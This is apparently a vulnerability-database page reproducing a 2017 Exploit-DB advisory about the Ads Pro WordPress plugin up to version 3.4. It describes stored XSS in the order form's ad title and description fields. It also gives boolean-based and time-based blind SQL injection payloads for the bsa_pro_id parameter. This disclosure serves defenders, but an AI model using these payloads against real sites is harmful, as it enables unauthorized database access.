Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager

vendor:

by:

8bitsec

8,8

CVSS

HIGH

Stored XSS and Blind SQL Injection

79 (XSS) and 89 (SQL Injection)

CWE

Product Name: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager

Affected Version From: 3.4

Affected Version To: 3.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6

2017

Ads Pro Plugin – Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi

Multiple Stored XSS vulnerabilities were found in the Ad Title and Ad Description parameters of the Front End Order Form. The payload will execute when the ad is displayed. Blind SQL Injection was found on the bsa_pro_id parameter, with payloads of AND boolean-based blind - WHERE or HAVING clause and MySQL >= 5.0.12 AND time-based blind.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
# Date: 2017-07-25
# Exploit Author: 8bitsec
# Vendor Homepage: http://adspro.scripteo.info/
# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
# Version: 3.4
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-07-25

Product & Service Introduction:
===============================
Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.

Technical Details & Description:
================================

Multiple Stored XSS vulnerabilities found.

Blind SQL Injection on bsa_pro_id parameter.

Proof of Concept (PoC):
=======================

Stored XSS:

On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.

Blind SQL Injection:

Parameter: bsa_pro_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)

Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]